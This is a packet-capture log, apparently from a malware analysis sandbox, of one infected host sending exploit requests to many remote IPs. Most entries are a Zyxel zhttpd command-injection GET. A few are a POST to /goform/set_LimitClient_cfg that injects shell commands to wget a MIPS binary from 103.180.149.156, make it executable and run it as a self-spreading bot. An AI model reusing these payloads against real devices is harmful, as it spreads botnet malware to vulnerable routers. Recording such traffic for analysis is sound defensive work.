                                            Feb 2, 2024 06:21:08.551302910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3365192.168.2.1540170166.15.76.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551359892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3366192.168.2.1546646157.228.190.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551388979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3367192.168.2.1559388157.131.96.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551435947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3368192.168.2.15417129.220.26.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551470041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3369192.168.2.1539106197.5.226.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551518917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3370192.168.2.1558704172.177.239.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551559925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3371192.168.2.153669246.48.244.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551593065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3372192.168.2.154451227.148.8.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551635027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3373192.168.2.1552248101.7.201.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551667929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3374192.168.2.1545960130.184.14.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551688910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3375192.168.2.1543440138.188.79.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551706076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3376192.168.2.1536226100.12.178.76443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551773071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3377192.168.2.154441694.41.240.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551806927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3378192.168.2.1555748159.27.111.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551845074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3379192.168.2.1549706132.250.83.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551875114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3380192.168.2.1556260217.117.255.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551907063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3381192.168.2.155544441.50.219.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.551960945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3382192.168.2.1545244107.24.152.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.552016020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3383192.168.2.1548734153.99.200.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.552056074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3384192.168.2.1538088194.8.228.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.552845001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3385192.168.2.154861432.69.85.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.554816008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3386192.168.2.1554648125.153.82.208080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.370033979 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:09.655432940 CET103INHTTP/1.1 404 Not Found
                                            Content-Type: text/plain
                                            Content-Length: 30
                                            Connection: close


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3387192.168.2.153590234.144.222.498080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.472191095 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3388192.168.2.1556222200.62.160.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562556982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3389192.168.2.154053452.8.168.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562587976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3390192.168.2.155373875.82.218.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562634945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3391192.168.2.1542360120.223.58.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562666893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3392192.168.2.154542617.200.233.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562700987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3393192.168.2.1546930211.146.85.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562752962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3394192.168.2.155873053.160.34.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562791109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3395192.168.2.1559642179.65.72.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562822104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3396192.168.2.1542248129.48.35.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562871933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3397192.168.2.1539826223.197.201.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562900066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3398192.168.2.1545696138.109.247.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562946081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3399192.168.2.155559885.216.161.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562959909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3400192.168.2.155083877.56.110.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.562995911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3401192.168.2.1559702210.157.189.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563043118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3402192.168.2.1539272123.151.213.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563101053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3403192.168.2.154591489.152.239.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563131094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3404192.168.2.155378477.135.73.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563174009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3405192.168.2.1553106156.42.156.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563200951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3406192.168.2.1559898137.208.132.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563218117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3407192.168.2.156006081.18.71.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563268900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3408192.168.2.1537422209.244.132.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563316107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3409192.168.2.154205620.79.243.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563369036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3410192.168.2.1538086200.190.55.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563395023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3411192.168.2.1542320125.157.56.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563422918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3412192.168.2.15486869.249.25.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563446045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3413192.168.2.1541102130.107.24.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563500881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3414192.168.2.1558310117.255.94.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563549042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3415192.168.2.154827669.162.85.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563575029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3416192.168.2.154100034.119.40.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563611984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3417192.168.2.1542130112.162.138.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563654900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3418192.168.2.1553372156.37.187.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563710928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3419192.168.2.1542394216.76.42.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563750029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3420192.168.2.153654895.22.84.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563780069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3421192.168.2.1558722199.248.212.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563838959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3422192.168.2.154074027.117.83.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563872099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3423192.168.2.1537618167.129.185.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.563906908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3424192.168.2.15582088.133.21.231443
                                            TimestampBytes transferredDirectionData
